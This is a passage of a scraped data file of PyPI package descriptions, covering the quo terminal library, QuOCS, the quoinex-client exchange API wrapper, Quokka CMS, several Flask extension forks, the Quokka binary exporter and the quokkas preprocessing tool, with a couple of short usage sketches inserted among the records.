\")Example 8Autocomplete textPress [Tab] to autocompletefromquo.promptimportPromptfromquo.completionimportWordCompleterexample=WordCompleter(['USA','UK','Canada','Kenya'])session=Prompt(completer=example)session.prompt('Which country are you from?: ')Example 9Autosuggest textAuto suggestion is a way to propose some input completions to the user. 
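A minimal sketch for the quntoken entry above, combining only the options that entry documents (-f/-m on the command line, form=/mode= in tokenize()); it is illustrative, so check the quntoken docs for exact behaviour.

# CLI: sentence segmentation only, JSON output, reading STDIN and writing STDOUT
#   quntoken -f json -m sentence <input.txt >output.json
# Python API: the same settings through the documented form/mode parameters
from quntoken import tokenize

with open('input.txt') as inp:
    for chunk in tokenize(inp, form='json', mode='sentence'):
        print(chunk, end='')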
Usually, the input is compared to the history and when there is another entry starting with the given text, the completion will be shown as gray text behind the current input.\nPressing the right arrow \u2192 or ctrl-e will insert this suggestion, alt-f will insert the first word of the suggestion.fromquo.historyimportMemoryHistoryfromquo.promptimportPromptMemoryHistory.append(\"import os\")MemoryHistory.append('print(\"hello\")')MemoryHistory.append('print(\"world\")')MemoryHistory.append(\"import path\")session=Prompt(history=MemoryHistory,suggest=\"history\")whileTrue:session.prompt('> ')Read more onPromptQuo BarDraw a horizontal bar with an optional title, which is a good way of dividing your terminal output in to sections.fromquo.barimportBarbar=Bar(\"I am a bar\")bar.draw()Styled barfromquo.barimportBarbar=Bar(\"I am a styled bar\")bar.draw(fg=\"blue\",bg=\"yellow\")Right alignedfromquo.barimportBarbar=Bar(\"I am right aligned\")bar.draw(align=\"right\")Quo ConsoleFor more control over quo terminal content, import and construct aConsoleobject.Launching ApplicationsQuo supports launching applications throughConsole.launchExample 1fromquo.consoleimportConsoleconsole=Console()console.launch(\"https://quo.rtfd.io/\")Example 2fromquo.consoleimportConsoleconsole=Console()console.launch(\"/home/path/README.md\",locate=True)Spin\ud83d\udd01Quo can create a context manager that is used to display a spinner on stdout as long as the context has not exitedimporttimefromquo.consoleimportConsoleconsole=Console()withconsole.spin():time.sleep(3)print(\"Hello, World\")Read more onConsoleQuo DialogsHigh level API for displaying dialog boxes to the user for informational purposes, or to get input from the user.Example 1Message Box dialogfromquo.dialogimportMessageBoxMessageBox(title='Message window',text='Do you want to continue?\\nPress ENTER to quit.')Example 2Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:')Multiline Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:',multiline=True)Password Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:',hide=True)Radiolistfromquo.dialogimportRadiolistBoxRadiolistBox(title=\"RadioList dialog example\",text=\"Which breakfast would you like ?\",values=[(\"breakfast1\",\"Eggs and beacon\"),(\"breakfast2\",\"French breakfast\"),(\"breakfast3\",\"Equestrian breakfast\")])Read more onDialogsQuo Key Binding\ud83d\udd10A key binding is an association between a physical key on akeyboard and a parameter.fromquoimportechofromquo.keysimportbindfromquo.promptimportPromptsession=Prompt()# Print \"Hello world\" when ctrl-h is pressed@bind.add(\"ctrl-h\")def_(event):echo(\"Hello, World!\")session.prompt(\"\")Read more onKey bindingsQuo ParserYou can parse optional and positional arguments with Quo and generate help pages for your command-line tools.fromquo.parseimportParserparser=Parser(description=\"This script prints hello NAME COUNT times.\")parser.argument('--count',default=3,type=int,help='number of greetings')parser.argument('name',help=\"The person to greet\")arg=parser.parse()forxinrange(arg.count):print(f\"Hello{arg.name}!\")$pythonprog.pyJohn--count4And what it looks like:Here's what the help page looks like:$pythonprog.py--helpRead more onParserQuo ProgressBarCreating a new progress bar can be done by calling the classProgressBarThe progress can be displayed for any iterable. 
This works by wrapping the iterable (likerange) with the classProgressBarimporttimefromquo.progressimportProgressBarwithProgressBar()aspb:foriinpb(range(800)):time.sleep(.01)Read more onProgressQuo RuleUsed for drawing a horizontal line.Example 1fromquo.ruleimportRulerule=Rule()rule.draw()Example 2A styled line.fromquo.ruleimportRulerule=Rule()rule.draw(color=\"purple\")Example 3A multicolored line.fromquo.ruleimportRulerule=Rule()rule.draw(multicolored=True)Quo TablesThis offers a number of configuration options to set the look and feel of the table, including how borders are rendered and the style and alignment of the columns.Example 1fromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print()Example 2Right aligned tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(align=\"right\")Example 3Colored tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(fg=\"green\")Example 4Column widthIn situations where fields are expected to reasonably be too long to look good as a single line, parametercolumn_widthcan help automate word wrapping long fields.fromquo.tableimportTabledata=[[1,'John Smith','This is a rather long description that might look better if it is wrapped a bit']]table=Table(data)table.print(headers=(\"Issue Id\",\"Author\",\"Description\"),column_width=[None,None,30])Example 5Grid tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(theme=\"grid\")Read more onTableQuo WidgetsA collection of reusable components for building full screen applications.FrameUsed draw a border around any container, optionally with a title.Read more onFrameLabelWidget that displays text.Read more onLabelBox + Labelfromquoimportcontainerfromquo.boximportBoxfromquo.labelimportLabelcontent=Label(\"Hello, World!\",fg='red',bg='yellow')container(content)Read more onWidgetsFor more intricate examples, have a look in theexamplesdirectory and the documentation.Donate\ud83c\udf81In order to for us to maintain this project and grow our community of contributors.DonateQuo is...SimpleIf you know Python you can easily use quo and it can integrate with just about anything.Getting HelpCommunityFor discussions about the usage, development, and the future of quo, please join our Google communityCommunity\ud83d\udc68\u200d\ud83d\udc69\u200d\ud83d\udc66\u200d\ud83d\udc66ResourcesBug trackerIf you have any suggestions, bug reports, or annoyances please report them\nto our issue tracker atBug trackeror send an email to:\ud83d\udce5scalabli@googlegroups.com|scalabli@proton.meBlogs\ud83d\udcbb\u2192 How to build CLIs usingquoLicense\ud83d\udcd1This software is licensed under theMIT License. See theLicensefile in the top distribution directory for the full license text.Code of ConductCode of Conduct is adapted from the Contributor Covenant,\nversion 1.2.0 available atCode of Conduct"} +{"package": "quocs-lib", "pacakge-description": "The optimization libraryQuOCS (Quantum Optimal Control Suite) is a python software package for model- and experiment-based optimizations of quantum processes.\nIt uses the excellent Numpy and Scipy packages as numerical backends.\nQuOCS aims to provide a user-friendly interface to solve optimization problems. 
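A small sketch tying together the quo Table options shown in the Tables section above (headers, column_width, theme, fg); it assumes these documented keyword arguments of table.print() can be combined in a single call, so treat it as illustrative and check the Table docs linked in that section.

from quo.table import Table

data = [
    [1, "Alice", "Short note"],
    [2, "Bob", "A much longer description that looks better when wrapped to a narrower column"],
]
table = Table(data)
# headers, per-column width, grid borders and colour in one call (assumed to compose)
table.print(
    headers=("Id", "Name", "Description"),
    column_width=[None, None, 30],
    theme="grid",
    fg="green",
)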
A variety of popular optimal control algorithms are available:GRAPE (GRadient Ascent Pulse Engineering) AlgorithmdCRAB (dressed Chopped RAndom Basis) AlgorithmAD-GRAPE (Automatic Differentiation) Algorithm - for Mac and Linux onlyDirect Search Algorithm, i.e. Nelder Mead, CMA-ES...QuOCS is open source and its interface structure allows for user-friendly customizability. It can be used on all Unix-based platforms and on Windows.InstallationQuOCS is available onpip. You can install QuOCS by doingpipinstallquocs-libThe requirements are:setuptools >= 44.0.0numpy >= 1.19.1scipy >= 1.5.1If you want to use the AD Algorithm, the installation ofJAX(Autograd and XLA) is required. Please note that this package isn't available for Windows.Editable modeIf you want to customize the algortihm and basis inside QuOCS, the package has to be installed in the editable mode. You can easily do that with the following commands:gitclonehttps://github.com/Quantum-OCS/QuOCS.gitcdQuOCS\npipinstall-e.DocumentationThe possiblesettingsfor the JSON file can be foundhere.You can find the latest development documentationhere.A selection of demonstration notebooks is available, which demonstrate some of the many features of QuOCS. These are stored in theQuOCS/QuOCS-jupyternotebooks repositoryhere on GitHub.Example of usageUsing QuOCS is intuitive and simple. The main steps are:Create and load the optimization dictionary. This json file contains all the optimization settings (as an example seethis file).fromquocslib.utils.inputoutputimportreadjsonoptimization_dictionary=readjson(\"opt_dictionary.json\"))Create Figure of Merit object. This is an instance of a class that contains the physical problem to be optimized. In the following, you can see an example of how to define this class. The input and output ofget_FoMshould not be changed.fromquocslib.utils.AbstractFoMimportAbstractFoM# Define problem classclassOneQubit(AbstractFoM):def__init__(self,args_dict:dict=None):\"\"\" Initialize the dynamics variables\"\"\"ifargs_dictisNone:args_dict={}...defget_FoM(self,pulses:list=[],parameters:list=[],timegrids:list=[])->dict:# Compute the dynamics and FoM...return{\"FoM\":fidelity}# Create Figure of Merit objectFoM_object=OneQubit()Define the optimizer by initializing it with the uploaded optimization dictionary and FoM object. After that the execution can be run.fromquocslib.OptimizerimportOptimizer# Define Optimizeroptimization_obj=Optimizer(optimization_dictionary,FoM_object)# Execute the optimizationoptimization_obj.execute()Complete examples are provided inQuOCS/QuOCS-jupyternotebooks repositoryor in thetestsfolders.Usage with QudiIf you want to use QuOCS in combination with Qudi, please have a look atthis repositorywith additional files, information and a tutorial.ContributeWould you like to implement a new algorithm or do you have in mind some new feature it would be cool to have in QuOCS?\nYou are most welcome to contribute to QuOCS development! You can do it by forking this repository and sending pull requests, or filing bug reports at theissues page.\nAll code contributions are acknowledged in thecontributorssection in the documentation. 
Thank you for your cooperation!Citing QuOCSIf you use QuOCS in your research, please cite ourintroductory software paper.@article{QuocsRossignolo2023,\n title = {{QuOCS: The Quantum Optimal Control Suite}},\n journal = {{C}omputer {P}hysics {C}ommunications},\n pages = {108782},\n year = {2023},\n issn = {0010-4655},\n doi = {https://doi.org/10.1016/j.cpc.2023.108782},\n url = {https://www.sciencedirect.com/science/article/pii/S0010465523001273},\n author = {Marco Rossignolo and Thomas Reisser and Alastair Marshall and Phila Rembold and Alice Pagano and Philipp J. Vetter and Ressa S. Said and Matthias M. M\u00fcller and Felix Motzoi and Tommaso Calarco and Fedor Jelezko and Simone Montangero}\n}Authors and contributorsMarco RossignoloThomas ReisserAlastair MarshallPhila RemboldAlice Pagano"} +{"package": "quoicoubeh", "pacakge-description": "https://fr.wiktionary.org/wiki/quoicoubeh"} +{"package": "quoine", "pacakge-description": "UNKNOWN"} +{"package": "quoinex-client", "pacakge-description": "quoinex-client is a python client (sync/async) library for\nliquid(quoinex) apiInstallation$ pip install quoinex-clientUsage## sync#fromquoinex_client.syncimportClientclient=Client(public_key='your api key',private_key='your api secret')response=client.get_products()print(response.status_code,response.json())## async#importgrequestsfromquoinex_client.asyncimportAsyncclient=Async(public_key='your api key',private_key='your api secret')reqs=[client.get_products(),client.get_product(id=1),...]response=grequests.map(reqs)forrinresponse:print(r.status_code,r.json())client.get_products()# GET /productsclient.get_product(id=1)# GET /products/:idclient.get_order_book(id=1)# GET /products/:id/price_levelsclient.get_executions(product_id=1)# GET /executions?product_id=1&limit=2&page=2client.get_executions(currency_pair_code='BTCJPY',timestamp=1526012797)# GET /executions?product_id=1×tamp=1430630863&limit=2client.get_interest_rate_ladder(currency='USD')# GET /ir_ladders/USDclient.create_order(order_type='limit',product_id=1,side='sell',quantity=0.01,price=500.0)# POST /ordersclient.get_order(id=1)# GET /orders/:idclient.get_orders()# GET /orders?funding_currency=:currency&product_id=:product_id&status=:status&with_details=1client.cancel_order(id=1)# PUT /orders/:id/cancelclient.edit_live_order(id=1)# PUT /orders/:idclient.get_order_trades(id=1)# GET /orders/:id/tradesclient.get_your_executions(product_id=1)# GET /executions/me?product_id=:product_idclient.get_fiat_accounts()# GET /fiat_accountsclient.create_fiat_account(currency='USD')# POST /fiat_accountsclient.get_crypto_accounts()# GET /crypto_accountsclient.get_account_balances()# GET /accounts/balanceclient.create_loan_bid(quantity=50,currency='USD',rate=0.0002)# POST /loan_bidsclient.get_loan_bids(currency='USD')# GET /loan_bids?currency=:currencyclient.close_loan_bid(id=1)# PUT /loan_bids/:id/closeclient.get_loans(currency='JPY')# GET /loans?currency=JPYclient.update_loan(id=1)# PUT /loans/144825client.get_trading_accounts()# GET /trading_accountsclient.get_trading_account(id=1)# GET /trading_accounts/:idclient.update_leverage_level(id=1)# PUT /trading_accounts/:idclient.get_trades()# GET /trades?funding_currency=:funding_currency&status=:statusclient.close_trade(id=1)# PUT /trades/:id/closeclient.close_all_trades()# PUT /trades/close_allclient.update_trade(id=1,stop_loss=300,take_profit=600)# PUT /trades/:idclient.get_trade_loans(id=1)# GET /trades/:id/loansContributingFork itCreate your feature branch (git checkout-bmy-new-feature)Commit your changes 
(git commit-am'Add some feature')Push to the branch (git push originmy-new-feature)Create new Pull Request"} +{"package": "quokka", "pacakge-description": "quokkaThe Happiest CMF in the worldQuokka is a Content Management Framework written in Python.A lightweight framework to build CMS (Content Management System) as\nwebsites, portals, blogs, applications and anything related to\npublishing content to the web.Quokka is not limited to CMS area, it is also possible to create Quokka\nextensions to provide any kind of web application based on Python and\nFlask.Quokka can also (optionally) generate a static website from the contents\ngenerated in its admin interface.FeaturesWeb based content management admin interfaceMultiple content formats (markdown, rst, html, plaintext)Compatibility with any of thePelican ThemesFlat file NoSQL databaseTinyDBor optionallyMongoDBfor\nscale deploymentsHost the Quokka server or generate a static websiteExtensible via modules/pluginsPowered by Python, Flask, Flask-Admin, TinyMongo and Pelican ThemesQuick StartInstall and run for development modegitclonehttps://github.com/rochacbruno/quokkacdquokkapython3-mvenvvenv.venv/bin/activatemakeinstallmakedevserverOr install quokka from PyPIpython3-mvenvvenv.venv/bin/activatepip3installquokkaNOTE:QuokkaCMSrequiresPython3.6+Start a project$quokkainitNewWebsite--theme=flex--modules=gitpages,heroku...\ud83d\udc39Quokkaprojectcreated\ud83d\udc39\ud83d\udcddName:NewWebsite\ud83d\udcc1Location:/tmp/newwebsite\ud83d\udcdaTemplate:default\ud83c\udfa8Themes:flexthemeinstalled\ud83d\ude9aModules:[gitpages,heroku]installed\ud83d\udd27Config:Configfilewrittenin/tmp/newwebsite/quokka.yml\u27a1Goto/tmp/newwebsite\u2699run`quokkarunserver`tostart!\ud83d\udcc4Checkthedocumentationonhttp://quokkaproject.org\ud83d\udc39HappyQuokka!\ud83d\udc39YES!itoutputsemojis\ud83d\udc39The above command will generate your project inmyprojectfolder as:.\u251c\u2500\u2500databases# TinyDB database files (gitignored)\u251c\u2500\u2500modules# Custom modules to load on EXTRA_EXTENSIONS\u251c\u2500\u2500static_build# output static site\u251c\u2500\u2500themes# Front-end Themes (Pelican and Quokka Themes supported)\u251c\u2500\u2500uploads# Media uploaded via admin\u251c\u2500\u2500.gitignore# gitignore to exclude sensitive files\u251c\u2500\u2500quokka.yml# Project settings\u251c\u2500\u2500.secrets.yml# To store keys, tokens and passwords (gitignored)\u2514\u2500\u2500wsgi.py# To deploy `gunicorn wsgi:app`You can optionally pass arguments:Choose existing theme (the default isMalt)quokkainitmywebsite--themehttp://github.com/user/themeInstall modulesquokkainitmywebsite--themehttp://github.com/user/theme--modules=\"commerce,foo\"theabovelooksfor``quokka_commerce``and``quokka_foo``inPyPIandinstallsitSet important configurationsquokkainitmywebsite--themehttp://github.com/user/theme--config=\"auth_enabled=false\"Thatisoptional,youhavetoedit``quokka.yml``totuneyoursettings.Run your websitequokkarunserver--port5000Access admin interfacehttp://localhost:5000/adminAccess your sitehttp://localhost:5000DeployYou can deploy your Quokka Website in a WSGI serverCheck thewsgi.pyand refer to it when deploying in wsgi servers.cdmyprojectgunicornwsgi:app-w4-b\"0.0.0.0:8000\"An example ofsupervisordconfig[program:quokka]command=/myproject/venv/bin/gunicorn wsgi:app -w 4 -b \"0.0.0.0:8000\"directory=/myprojectFor more information readGunicorn\ndocumentationPublish Static HTML websiteNOTE: To generate a static website all user management, keys and\npasswords will be removed 
from settings.You can generate a static HTML website to host anywhereOnce you have your website running locally you can easily generate a\nstatic HTML website from it.$quokkapublish--static[--outputpath]GeneratingstaticHTMLwebsiteon./static_buildfolderOnce you have a ./static_build folder populated with static website you\ncan deploy it using SCP, FTP or git, it is a full static website.Deploying to github pages from command lineNOTE: You need either ssh key access to github or it will ask\nlogin/passwordquokkapublish--static--git=rochacbruno/mysite--branch=gh_pagesTheaboveisalsoavailableinadminunder'publish'menu.Deploying via SCPquokkapublish--static--scp--dest='me@hostname:/var/www/mysite'[--sshkey~/.ssh/key][--passwordxyz]password:...Deploying to HerokuThis requiresherokuclient installed, ifProcfileis not\nfound it will be generatedquokkapublish--static--heroku--optionsDeploying via FTPquokkapublish--static--ftp--host='ftp://server.com'--dest='/var/www/mysite'Load database from remote deployment (only for TinyDB)When you publish a static website along with the static files the\ndatabase also goes to the server under the databases/ folder only as a\nbackup and snapshot.You can load that remote database locally e.g: to add new posts and then\nre-publishquokkarestoredb--remote--git=rochacbruno/mysiteCreatingabackupoflocaldatabase...DownloadingremotedatabaseRestoringdatabase..Done...Now you can runquokka runserveropen yourlocalhost:5000/adminwrite new content and thenPublishwebsite again using command line\nor admin interface.NOTE: If you want to restore a local database use--localand--pathpath/to/dbUsing MongoDBYou can choose to use MongoDB instead of TinyDB, That is useful\nspecially if you deploy or local instance has more than one admin user\nconcurrently and also useful if you want to install plugins which\nsupport MongoDB only (because it relies on aggregations and gridfs)You only need a running instance of Mongo server and changequokka.yml:DBon your project from:quokka:DB:system:tinydbfolder:databasesto:quokka:DB:system:mongodbname:my_databasehost:127.0.0.1port:2600Then when runningquokkaagain it will try to connect to that Mongo\nServer.With that you can deploy your site onwsgiserver or can also\ngeneratestaticwebsite.Running mongo in a Docker containercdyour_quokka_project_folderdockerrun-d-v$PWD/databases:/data/db-p27017:27017mongo# wait some seconds until mongo is startedquokkarunserverContributing to Quokka CMS DevelopmentDo you want to be part of this open-source project?Take a look atContributing GuidelinesSetup a contributor environmentEnsure you havePython3.6+clone this repo and:gitclonehttps://github.com/$YOURNAME/quokka_ngcdquokka_ng# create a Python3.6 virtual envmakecreate_env# activate the venv.venv/bin/activate# install Quokka in --editable mode (using flit)makeinstall# run quokkamakedevserverAccesshttp://localhost:5000/adminandhttp://localhostROADMAPThis list is available onhttps://github.com/rochacbruno/quokka_ng/issuesThis is the list of tasks to be completed until1.0.0can be\nreleased. support 100% coming only formaltandbootstrap3themes"} +{"package": "quokka-flask-admin", "pacakge-description": "Flask-AdminThe project was recently moved into its own organization. Please update your\nreferences togit@github.com:flask-admin/flask-admin.git.IntroductionFlask-Admin is a batteries-included, simple-to-useFlaskextension that lets you\nadd admin interfaces to Flask applications. 
It is inspired by thedjango-adminpackage, but implemented in such\na way that the developer has total control of the look, feel and functionality of the resulting application.Out-of-the-box, Flask-Admin plays nicely with various ORM\u2019s, includingSQLAlchemy,MongoEngine,pymongoandPeewee.It also boasts a simple file management interface and aredis clientconsole.The biggest feature of Flask-Admin is flexibility. It aims to provide a set of simple tools that can be used for\nbuilding admin interfaces of any complexity. So, to start off with you can create a very simple application in no time,\nwith auto-generated CRUD-views for each of your models. But then you can go further and customize those views & forms\nas the need arises.Flask-Admin is an active project, well-tested and production ready.ExamplesSeveral usage examples are included in the/examplesfolder. Please feel free to add your own examples, or improve\non some of the existing ones, and then submit them via GitHub as apull-request.You can see some of these examples in action athttp://examples.flask-admin.org.\nTo run the examples on your local environment, one at a time, do something like:cd flask-admin\npython examples/simple/app.pyDocumentationFlask-Admin is extensively documented, you can find all of the documentation athttps://flask-admin.readthedocs.io/en/latest/.The docs are auto-generated from the.rstfiles in the/docfolder. So if you come across any errors, or\nif you think of anything else that should be included, then please make the changes and submit them as apull-request.To build the docs in your local environment, from the project directory:pip install -r requirements-dev.txt\nsudo make htmlAnd if you want to preview any.rstsnippets that you may want to contribute, go tohttp://rst.ninjs.org/.InstallationTo install Flask-Admin, simply:pip install flask-adminOr alternatively, you can download the repository and install manually by doing:git clone git@github.com:flask-admin/flask-admin.git\ncd flask-admin\npython setup.py installTestsTest are run withnose. If you are not familiar with this package you can get some more info fromtheir website.To run the tests, from the project directory, simply:pip install -r requirements-dev.txt\nnosetestsYou should see output similar to:.............................................\n----------------------------------------------------------------------\nRan 102 tests in 13.132s\n\nOKFor all the tests to pass successfully, you\u2019ll need Postgres & MongoDB to be running locally. For Postgres:CREATE DATABASE flask_admin_test;\nCREATE EXTENSION postgis;3rd Party StuffFlask-Admin is built with the help ofBootstrapandSelect2.If you want to localize your application, install theFlask-BabelExpackage.You can help improve Flask-Admin\u2019s translations through Crowdin:https://crowdin.com/project/flask-adminChangelog1.4.2Small bug fix release. Fixes regression that prevented usage of \u201cvirtual\u201d columns with a custom formatter.1.4.1Official Python 3.5 supportCustomizable row actionsTablib support (exporting to XLS, XLSX, CSV, etc)Updated external dependencies (jQuery, x-editable, etc)Added settings that allows exceptions to be raised on view errorsBug fixes1.4.0Updated and reworked documentationFileAdmin went through minor refactoring and now supports remote file systems. Comes with the new, optional, AWS S3 file management interfaceConfigurable CSV export for model viewsAdded overridable URL generation logic. 
Allows using custom URLs with parameters for administrative viewsAdded column_display_actions to ModelView control visibility of the action column without overriding the templateAdded support for the latest MongoEngineNew SecureForm base class for easier CSRF validationLots of translation-related fixes and updated translationsBug fixes1.3.0New feature: Edit models in the list view in a popupNew feature: Read-only model details viewFixed XSS in column_editable_list valuesImproved navigation consistency in model create and edit viewsAbility to choose page size in model list viewUpdated client-side dependencies (jQuery, Select2, etc)Updated documentation and examplesUpdated translationsBug fixes"} +{"package": "quokka-flask-htmlbuilder", "pacakge-description": "===============================flask-htmlbuilder===============================.. image:: https://img.shields.io/travis/quokkaproject/flask-htmlbuilder.svg:target: https://travis-ci.org/quokkaproject/flask-htmlbuilder.. image:: https://img.shields.io/pypi/v/flask-htmlbuilder.svg:target: https://pypi.python.org/pypi/flask-htmlbuilderHTML builder for Python and FlaskFlask-HTMLBuilder~~~~~~~~~~~~~~~~~Flask-HTMLBuilder is a Flask extension that allows flexible and easyPython-only generation of HTML snippets and full HTML documents using arobust syntax. For more advanced usage it provides a lean templateinheritance system that is intertwined with the Flask/Werkzeug endpointmechanisms.Forked from: http://majorz.github.com/flask-htmlbuilder/"} +{"package": "quokka-flask-login", "pacakge-description": "Flask-Login-----------Flask-Login provides user session management for Flask. It handles thecommon tasks of logging in, logging out, and remembering your users'sessions over extended periods of time.Flask-Login is not bound to any particular database system or permissionsmodel. The only requirement is that your user objects implement a fewmethods, and that you provide a callback to the extension capable ofloading users from their ID.Links`````* `documentation `_* `development version`_"} +{"package": "quokka-flask-mongoengine", "pacakge-description": "Flask-MongoEngine--------------Flask support for MongoDB using MongoEngine.Includes `WTForms`_ support.Links`````* `development version`_"} +{"package": "quokka-flask-security", "pacakge-description": "Flask-Security quickly adds security features to your Flask application.ResourcesDocumentationIssue TrackerCodeDevelopment Version"} +{"package": "quokka-project", "pacakge-description": "Quokkaimage generated byDALL-ETable of ContentsIntroductionInstallationUsageBuildingDocumentationFAQIntroductionQuokka is a binary exporter: from the disassembly of a program, it generates\nan export file that can be used without the disassembler.The main objective ofQuokkais to enable to completely manipulate the\nbinary without ever opening a disassembler after the initial step. Moreover, it\nabstracts the disassembler's API to expose a clean interface to the users.Quokka is heavily inspired byBinExport,\nthe binary exporter used by BinDiff.InstallationPython pluginThe plugin is built in the CI and available in theregistry.It should be possible to install directly from PIP using this kind of commmand:$ pip install quokka-projectIDA PluginNote: The IDA plugin is not needed to read aQuokkagenerated file. 
It is\nonly used to generate them.Quokka is currently compatible with IDA 7.3+The plugin is built on the CI and available in theReleasetab.To download the plugin, get the file namedquokka_plugin**.so.UsageExport a file!!! noteThis requires a working IDA installation.Either using command line:$ idat64 -OQuokkaAuto:true -A /path/to/hello.i64Note: We are usingidat64and notida64to increase the export speed\nbecause we don't need the graphical interface.Using the plugin shortcut inside IDA: (by default) Alt+ALoad an export fileimportquokka# Directly from the binary (requires the IDA plugin to be installed)ls=quokka.Program.from_binary(\"/bin/ls\")# From the exported filels=quokka.Program(\"ls.quokka\",# the exported file\"/bin/ls\")# the original binaryBuildingBuilduser@host:~/quokka$cmake-Bbuild\\# Where to build-S . \\ # Where are the sources-DIdaSdk_ROOT_DIR:STRING=path/to/ida_sdk \\ # Path to IDA SDK-DCMAKE_BUILD_TYPE:STRING=Release \\ # Build Typeuser@host:~/quokka$cmake--buildbuild--targetquokka_plugin---jTo install the plugin:user@host:~/quokka$cmake--installbuildIn any case, the plugin will also be inbuild/quokka-install. You can\ncopy it to IDA's user plugin directory.user@host:~/quokka$cpbuild/quokka-install/quokka*64.so$HOME/.idapro/plugins/For more detailed information about building, seeBuildingDocumentationDocumentation is available online atdocumentationFAQYou can see a list of questions hereFAQ"} +{"package": "quokkas", "pacakge-description": "quokkasData analysis tool that you didn't know you needed.Quokkas is a powerful pandas-based data analysis tool. In addition to the well-known pandas functionality, it provides\ntools for data preprocessing, pipelining and explorative data analysis.Let's have a short overview of these three pillars.PreprocessingWith quokkas, it is incredibly easy to scale, impute, encode (incl. dates), normalize, trim, and winsorize your data.\nThese operations are not only easy to use - they are fast, robust and preserve your DataFrame structure / typing.For instance, if you wish to standardize your data, you can simply do it like that:import quokkas as qk\ndf = qk.read_csv('42.csv')\ndf = df.scale('standard') \n# or simply df.scale('standard', inplace=True)By default, each transformation has anauto=Trueparameter. This parameter ensures that the transformations are\napplied only to \"relevant\" columns. For instance, scale, normalize, winsorize and trim are applied only to numeric\ncolumns, encode is applied to columns with \"few\" distinct values, and impute is strategy- and type-dependent (see more\nin our preprocessing deep-dive).Additionally, by default the transformations do not include the target column(s) - which you can set viadf.targetize('target_column_name')ordf.targetize(['target_one_column_name, 'target_two_column_name']). 
You can\nchange that behaviour by settinginclude_target=True, like indf.impute('simple', strategy='default', include_target=True),However, the user is, of course, able to simply select the columns that they want to transform or ensure that some\ncolumns are not transformed:# only 'investor_type' and 'country_of_origin' will be ordinally encoded\ndf.encode(kind='ordinal', include=['investor_type', 'country_of_origin'], inplace=True) \n# the first argument is always 'kind', so we could also use df.encode('ordinal', ...)\n\n# all automatically selected columns except 'defcon_state' will be onehot-encoded\ndf.encode('onehot', exclude=['defcon_state'], inplace=True)\n\n# all columns in the dataframe except for 'familial_status' and 'accommodation' will be robustly scaled\ndf.scale('robust', auto=False, exclude=['familial_status', 'accommodation'], inplace=True)As you might have guessed, this column selection procedure is uniform across all data preprocessing functions. Some\npreprocessing functions have several (at times kind-dependent) additional parameters. For user convenience they are\nheavily aligned with sklearn preprocessing functionality.For instance,df.scale('standard')supports additional booleanwith_meanandwith_stdparameters,df.encode('onehot')supports additionalcategories,drop,sparse,dtype,handle_unknown,min_frequencyandmax_categoriesparameters, anddf.impute('simple')supportsstrategy,missing_valuesandfill_valueparameters which can be used just like you would use respective sklearn'sStandardScaler,OneHotEncoder, andSimpleImputerparameters.But how could you use the transformed data for, say, training a model? Of course, you could transfer the data to two\nnumpy arrays and go from there:y = df['target_name'].to_numpy()\nX = df.drop('target_name'], axis=1).to_numpy()\n\n# which is equivalent to:\nX, y = df.separate(to_numpy=True)\n# if 'target_name' was targetized\n\nmodel = GradientBoostingClassifier(loss='log_loss', learning_rate=5e-2)\nmodel.fit(X, y)However, quokkas provides an even easier way to fit a model to the dataframe. You just need to do the following:df.fit(GradientBoostingClassifier(loss='log_loss', learning_rate=5e-2))\n\n# now you can access the trained model via\nmodel = df.pipeline.model\n\n# and you can make predictions for the dataframe like that:\ny_pred = df.predict()\n\n# or, if you wanted to predict the values for another dataframe, you could use:\ny_pred = df_test.predict(df.pipeline.model)This example forces us to think about the following natural problem: sometimes we would like to transform a dataframe in\nexactly the same way as another dataframe. This is very easy in quokkas! Let's quickly learn how to do it:PipeliningBy default, quokkas pipelines (most of) the dataframe functions. That means that after each transformation, quokkas\nsaves the data needed to do exactly the same transform again - which can be used, for instance, on another dataframe.\nThis new dataframe can be changed viadf_new.stream(df_old)- which finds the first operation indf_oldthat wasn't\napplied todf_newand applies the rest of thedf_oldpipeline todf_new.Here is an example: say we have some data in a csv file, and we would like to load it, add a couple of columns,\npreprocess the data, fit a model, and evaluate the performance on the test dataset. Of course, we want to evaluate the\nperformance of the model in a clean way - in particular, we would like to fit all data preprocessors (e.g. scaler)\nsolely on the training data, without looking at the test data. 
Here is how we do it:# load data\ndf = qk.read_csv('data.csv')\n\n# create a couple of additional variables\ndf['sales_cash_ratio'] = df['sales'] / df['cash'] \ndf['return'] = df['price'].pct_change()\ndf['return_squared'] = df['return'] ** 2\n\n# we would like to predict the returns for the next period:\ndf['target_return'] = df['return'].shift(-1)\n\n# split the data into train and test sets - convenient functionality, btw!\n# default split is 80% train and 20% test\ndf_train, df_test = df.train_test_split(random_seed=42)\n\n# turn on the inplace mode (default inplace=False in all functions) - strictly speaking not necessary,\n# could achieve the same by writing inplace=True for each preprocessing function \nqk.Mode.inplace()\n# this can be undone with qk.Mode.outplace()\n\n# targetize the target_return column, impute the missing values for feature columns\n# and drop missing values for target - note that the impute function imputes missing values for all \n# columns except target, so the only missing values left after imputing will be in the target\ndf_train.targetize('target_return').impute().dropna()\n\n# scale the data robustly, winsorize the data and encode auto-detected values\n# and encode dates - note that scaling and winsorization (with default auto=True) \n# does not affect non-numeric columns\ndf_train.scale('robust').winsorize(limits=(0.005, 0.005)).encode('onehot', drop='first').encode_dates(intrayear=True)\n\n# fit the model\ndf_train.fit(RandomForestRegressor())\n\n# change df_test exactly like we changed df_train, but without refitting of scalers / encoders\n# in a scenario when you want to refit transformers on the new dataframe, you can set fit=True\n# by default, stream will also copy the df_train's model\ndf_test.stream(df_train.pipeline)\n# or, alternatively, 